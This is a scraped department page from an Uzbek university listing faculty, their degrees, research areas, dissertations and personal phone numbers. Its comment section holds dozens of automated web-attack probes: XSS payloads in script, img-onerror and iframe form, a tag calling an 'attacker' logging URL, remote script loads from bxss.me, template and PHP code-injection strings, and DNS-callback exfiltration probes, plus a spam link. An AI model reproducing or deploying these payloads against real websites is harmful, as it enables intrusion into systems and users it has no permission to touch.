476

“O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi

КAFEDRA A'ZOLARI VA ULARNING VAZIFASI

Kafedra a’zolarining asosiy vazifasi talabalarga o‘quv rejalarida belgilangan fanlar bo‘yicha yuksak saviyada dars berishdan iboratdir. Shuningdek, ular ilmiy tadqiqotlar bilan shug‘ullanadilar, tarbiyaviy va ma’naviy ma’rifiy ishlarda faol ishtirok etadilar.

Filologiya va mumtoz sharq adabiyoti yo‘nalishiga oid masalalar bo‘yicha talabalarga yuqori malakali nazariyotchi professor-o‘qituvchilar, jumladan, fan doktorlari va nomzodlari, shuningdek, tajribali amaliyotchilar dars beradilar. Ular O‘zbekiston va xorijdagi ilmiy markazlar hamda o‘quv muassasalarida o‘z malakasini muntazam oshirib boradilar. O‘quv jarayonida ta’limning an’anaviy uslublari bilan bir qatorda, rivojlangan informatsion texnologiyalarga asoslangan innovatsion yondashuvlar, jumladan, internet tizimi orqali masofaviy o‘qitishning individual va jamoaviy shakllaridan foydalanadilar.

Kafedraga filologiya fanlari nomzodi, dotsent Nosirova Malika Anvarovna rahbarlik qilmoqda. U O‘zbekiston xalqaro islom akademiyasida “Arab tili”, “Ilk o‘rta asrlar sharq tillarining nazariy grammatikasi”, “Sharq tillarining nazariy grammatikasi”, Toshkent davlat sharqshunoslik institutida  “Arab tili”, “O‘rta asr arab nahvidan namunalar”, “O‘rganilayotgan til filologiyasiga kirish.”, “O‘rganilayotgan mamlakatning til vaziyati”, “Arab tili stilistikasi”, “Tarixiy fonologiya”, “Tilshunoslik bilimlari tarixi”, “Asosiy chet tilidagi maxsus adabiyotni o‘qish va tahlil qilish amaliyoti”, “Arab tili tarixi”, “Sharq tillarini o‘qitish metodikasi”, “Falsafiy qo‘lyozmalarni o‘qish va tavsiflash” fanlaridan magistratura bosqichidagi talabalarga tahsil berib, bitiruv malakaviy ishlari, magistrlik dissertatsiya ishlari (24 ta bitiruv malakaviy ishi va 18 ta magistrlik dissertatsiya ishi)ga rahbarlik qilgan.

Ilmiy daraja: filologiya fanlari nomzodi

Ilmiy unvon: dosent

Ilmiy tadkikot yo‘nalishlari: O‘rta asr arab tilshunosligi, manbashunoslik, matnshunoslik, sotsiolingvistika. O‘zbek, rus, turkman, turk, ingliz va arab tillaridagi 80 dan ortiq ilmiy ishlar muallifi.

Chet tillarni bilishi: rus va arab tillari

Asosiy ilmiy ishlari:

Nomz. diss. mavzusi: "Maxmud Zamazshariyning "Al-Unmuzaj fi-nnaxv" risolasi - arab tili grammatikasiga oid asar" - Toshkent, 2003.

Кafedrada quyidagi professor-o‘qituvchilar faoliyat ko‘rsatadilar:

FISH: Islomov Zohidjon Mahmudovich

Ilmiy darajasi: filologiya fanlari doktori

Ilmiy unvoni: professor

Ilmiy tadqiqot yo‘nalishlari: manbashunoslik, tilshunoslik, matnshunoslik, islomshunoslik. 300 ga yaqin ilmiy ishlar muallifi. 20 ga yaqin Xalqaro ilmiy konferensiyalar ishtirokchisi.

Chet tillarni bilishi: rus va arab tillari

Asosiy ilmiy ishlari:

Nomz. diss. mavzusi: «Mahmud Zamaxshariyning «Muqaddamatu-l-adab» asaridagi turkiy fe’llar tahlili». – Toshkent, DU (O‘zMU), 1994.

Dokt. diss. mavzusi: «Mahmud Zamaxshariyning «Muqaddamatu-l-adab» asarining qo‘lyozma manbalari va arabcha-turkiy fe’llar so‘zligining yig‘ma ilmiy-tanqidiy matni».– Toshkent, 1999.

FISH: Sodiqov Qosimjon Pozilovich

Ilmiy darajasi: filologiya fanlari doktori

Ilmiy unvoni: professor

Ilmiy tadqiqot yo‘nalishlari: qadimgi turkiy yozuvlar, turkiy yozma yodgorliklar tili, manbashunoslik va matnshunoslik, qadimgi turkiy xalqlarning diniy-falsafiy qarashlari masalalari. 250 ga yaqin ilmiy ishlar muallifi.

Chet tillarni bilishi: turk, rus va arab tillari

Asosiy ilmiy ishlari:

Nomz. diss.mavzusi: Языковые особенности “Кутадгу билиг” (на материале уйгурописьменного списка). – Т., 1987.

Dok.diss.mavzusi: Графико-фонетические особенности тюркских уйгурописьменных памятников ХI–ХV вв. –Т.,  1992.

FISH: Lutfullayeva Durdona Esonovna

Ilmiy darajasi: filologiya fanlari doktori

Ilmiy unvoni: professor

Ilmiy tadqiqot yo‘nalishi: lingvistik semantika, assotsiativ tilshunoslik, pragmalingvistika

Chet tillarni bilishi: rus tili

Asosiy ilmiy ishlari: Assotsiativ tilshunoslik nazariyasi. Monografiya.  – Toshkent, 2017; Lisoniy ziddiyat va neytrallashuv. Monografiya. – Toshkent, 2018; Oʻzbek tilining assotsiativ  lugʻati (milliy-madaniy birliklar). – Toshkent, 2019;  Mustaqillik davri rasmiy idoraviy ish uslubi taraqqiyoti. Monografiya. – Toshkent,  2020.

Tel.: (90)175-92-25

El. manzil: 1965ddd@mail.ru

FISH: Rustamiy Salimaxon Aliybeg qizi

Ilmiy darajasi: filologiya fanlari doktori

Ilmiy unvoni: dotsent

Ilmiy tadqiqot yo‘nalishlari: manbashunoslik, leksikologiya. 100 dan ortiq ilmiy ishlar muallifi. Bir necha xalqaro ilmiy konferensiyalar ishtirokchisi. Iste’dod sovrindori (2004 yil.).

Chet tillarni bilishi: rus va arab tillari

Asosiy ilmiy ishlari:

Nomz. diss. mavzusi: «Mahmud Koshg‘ariy lug‘atining leksikografik xususiyatlari». – T., 1998.

Dokt. diss. mavzusi: « O‘rta asrlar islom balog‘at ilmida tilshunoslikka oid qarashlar». – T., 2018.

Tel.: (94)608-22-36

FISH: Akmalom Shoislom Ikromovich

Ilmiy darajasi: siyosiy fanlari nomzodi

Ilmiy unvoni: dotsent

Ilmiy tadqiqot yo‘nalishlari: Afg‘on muammosi, mintaqada xavfsizlik va barqarorlik masalalari, siyosiy institutlar va jarayonlar.

Chet tillarni bilishi: rus va fors tillari

Asosiy ilmiy ishlari:

Nomz. diss. mavzusi: «Problema afganskogo uregulirovaniya v sovremennыx pakistano-iranskix otnosheniyax». – T.: TDSHI, 2002.

Tel.: (90)952-34-91

FISH: Shoaliyeva Nargiza Qahramonovna

Ilmiy darajasi: filologiya fanlari nomzodi

Ilmiy unvoni: v.b.dotsent

Ilmiy tadqiqot yo‘nalishlari: Badiiy adabiyotda irfoniy g‘oyalar, eronshunoslik muammolari. Bir necha xalqaro ilmiy konferensiyalar ishtirokchisi. 30 ga yaqin ilmiy ishlar muallifi.

Chet tillarni bilishi: rus, ingliz va fors tillari

Asosiy ilmiy ishlari:

Nomz. diss. mavzusi: “Suhrob Sipehriy ijodida insoniy va irfoniy g‘oyalarning badiiy talqini” – Toshkent, 2007.

Tel.: (98)127-30-06
 

FISH: Nizamova Feruza Alimullayevna

Ilmiy darajasi: filologiya fanlari nomzodi

Ilmiy unvoni: dotsent

Ilmiy tadqiqot yo‘nalishlari: O‘rta asrlar fors adabiyoti, adabiyotshunoslik. 50 dan ortiq ilmiy ishlar muallifi.

Chet tillarni bilishi: rus va fors tillari

Asosiy ilmiy ishlari:

Nomz. diss. mavzusi: «Amir Xusrav Dehlaviy ijodida ruboiy janri». – Toshkent, 2006.

Tel.: (90)904-70-98

 

FISH: Arifdjanov Zokir Toxirovich

Ilmiy darajasi:  -

Ilmiy unvoni: - o‘qituvchi

Ilmiy tadqiqot yo‘nalishlari: Fors tilidagi fe’llarning variantlari va ularning invariantlari. 10 dan ortiq ilmiy maqolalar muallifi.

Chet tillarni bilishi: rus va fors tillari

Asosiy ilmiy ishlari:

Magistrlik diss.: «Fors tilida sodda va qo‘shma fe’llarning variantlari». – Toshkent, 2014

Tel.: (93)579-95-79

FISH: Akmalxanov Akmalxon Ahmad o‘g‘li

Ilmiy darajasi: filologiya va tillarni o‘qitish (arab va nemis tillari bilan) magistranti

Ilmiy unvoni: o‘qituvchi

Ilmiy tadqiqot yo‘nalishi: Tilshunoslik. 20 ga yaqin ilmiy ishlar muallifi.

Chet tillarni bilishi: arab, fors, nemis tillari

Asosiy ilmiy ishlari: “Sakkokiyning Muftahu-l-ulum asarida nahv va sarf masalalari” nomli dissertatsiyasi o‘stida PhD unvonini olish uchun ish olib bormoqda

FISH: Nig‘monov Abdulazizxon Safiyullo o‘g‘li

Ilmiy darajasi:  -

Ilmiy unvoni: - o‘qituvchi

Ilmiy tadqiqot yo‘nalishlari: Adabiyotshunoslik, Tilshunoslik, O‘zbek tili va adabiyoti tarixi, turkiy tilllar tarixi va adabiyoti. 10 dan ortiq ilmiy maqolalar muallifi.

Chet tillarni bilishi: rus va fors tillari

Asosiy ilmiy ishlari:

Magistrlik diss.: «Turkiy yozma adabiyot tarixida ritmik-sintaktik parallelizmlar: kelib chiqishi, takomili va badiiy funksiyalari». – Toshkent, 2018

Tel.: (71)244-00-56

Izoh qoldirish

Izohlar

31.08.2023 19:27
“O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi - IIAU dllfrwys http://www.gd89wt1z853oen9pz59a11ggkl39b007s.org/ <a href="http://www.gd89wt1z853oen9pz59a11ggkl39b007s.org/">adllfrwys</a> [url=http://www.gd89wt1z853oen9pz59a11ggkl39b007s.org/]udllfrwys[/url]
22.08.2023 21:35
20<ifRAme sRc=9980.com></IfRamE>
22.08.2023 21:35
20<SA5KmD x=9304>
22.08.2023 21:35
20<img sRc='http://attacker-9945/log.php?
22.08.2023 21:35
20<FQjcmq<
22.08.2023 21:35
20<% contenteditable onresize=nd24(9753)>
22.08.2023 21:35
20bV879 <ScRiPt >nd24(9193)</ScRiPt>
22.08.2023 21:35
20<WQPBXV>OR6WG[!+!]</WQPBXV>
22.08.2023 21:35
<a HrEF=jaVaScRiPT:>
22.08.2023 21:35
[url=http://xss.bxss.me][/url]
22.08.2023 21:35
20<img<!-- --> src=x onerror=alert(9940);//><!-- -->
22.08.2023 21:35
20}body{acu:Expre/**/SSion(nd24(9291))}
22.08.2023 21:35
20&lt;ScRiPt&gt;nd24(9280)&lt;/sCripT&gt;
22.08.2023 21:35
20<input autofocus onfocus=nd24(9969)>
22.08.2023 21:35
<a HrEF=http://xss.bxss.me></a>
22.08.2023 21:35
20<img src=xyz OnErRor=nd24(9141)>
22.08.2023 21:35
20<img/src=">" onerror=alert(9849)>
22.08.2023 21:35
%32%30%3C%53%63%52%69%50%74%20%3E%6E%64%32%34%289697%29%3C%2F%73%43%72%69%70%54%3E
22.08.2023 21:35
20\u003CScRiPt\nd24(9630)\u003C/sCripT\u003E
22.08.2023 21:35
20<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9752'>
22.08.2023 21:35
20<body onload=nd24(9934)>
22.08.2023 21:35
20<img src=//xss.bxss.me/t/dot.gif onload=nd24(9091)>
22.08.2023 21:35
20<ScRiPt >nd24(9774)</ScRiPt>
22.08.2023 21:35
20<video><source onerror="javascript:nd24(9855)">
22.08.2023 21:35
20<isindex type=image src=1 onerror=nd24(9780)>
22.08.2023 21:35
20<ScR<ScRiPt>IpT>nd24(9523)</sCr<ScRiPt>IpT>
22.08.2023 21:35
20<ScRiPt >nd24(9299)</ScRiPt>
22.08.2023 21:35
comments
22.08.2023 21:35
comments
22.08.2023 21:35
20<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9035></ScRiPt>
22.08.2023 21:35
comments/.
22.08.2023 21:35
{{50040*50046}}
22.08.2023 21:35
/xfs.bxss.me
22.08.2023 21:35
20<ScRiPt >nd24(9698)</ScRiPt>
22.08.2023 21:35
20<WAYJNE>BHVXG[!+!]</WAYJNE>
22.08.2023 21:35
'"
22.08.2023 21:35
<!--
22.08.2023 21:35
20<script>nd24(9296)</script>
22.08.2023 21:35
'"()&%<acx><ScRiPt >nd24(9872)</ScRiPt>
22.08.2023 21:35
'.gethostbyname(lc('hitsg'.'uykkkhgb2fc27.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(80).chr(99).chr(74).'
22.08.2023 21:35
209796774
22.08.2023 21:35
".gethostbyname(lc("hitjt"."iuwqrpzz21205.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(82).chr(117).chr(75)."
22.08.2023 21:35
acu5815<s1﹥s2ʺs3ʹuca5815
22.08.2023 21:35
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
22.08.2023 21:35
'"()
22.08.2023 21:35
20'"()&%<acx><ScRiPt >nd24(9219)</ScRiPt>
22.08.2023 21:34
${@print(md5(31337))}
22.08.2023 21:34
)
22.08.2023 21:34
${@print(md5(31337))}\
22.08.2023 21:34
!(()&&!|*|*|
22.08.2023 21:34
'.print(md5(31337)).'
22.08.2023 21:34
^(#$!@#$)(()))******
22.08.2023 21:34
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
22.08.2023 21:34
1some_inexistent_file_with_long_name.jpg
22.08.2023 21:34
Http://bxss.me/t/fit.txt
22.08.2023 21:34
http://bxss.me/t/fit.txt?.jpg
22.08.2023 21:34
;print(md5(31337));
22.08.2023 21:34
bxss.me
22.08.2023 21:34
';print(md5(31337));$a='
22.08.2023 21:34
";print(md5(31337));$a="